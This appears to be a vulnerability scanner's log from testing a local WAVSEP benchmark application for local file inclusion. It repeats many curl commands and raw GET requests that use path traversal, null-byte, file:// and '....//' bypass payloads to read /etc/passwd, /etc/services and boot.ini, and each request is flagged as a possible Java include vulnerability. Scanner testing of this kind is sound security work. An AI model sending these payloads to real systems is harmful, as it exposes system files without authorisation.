curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
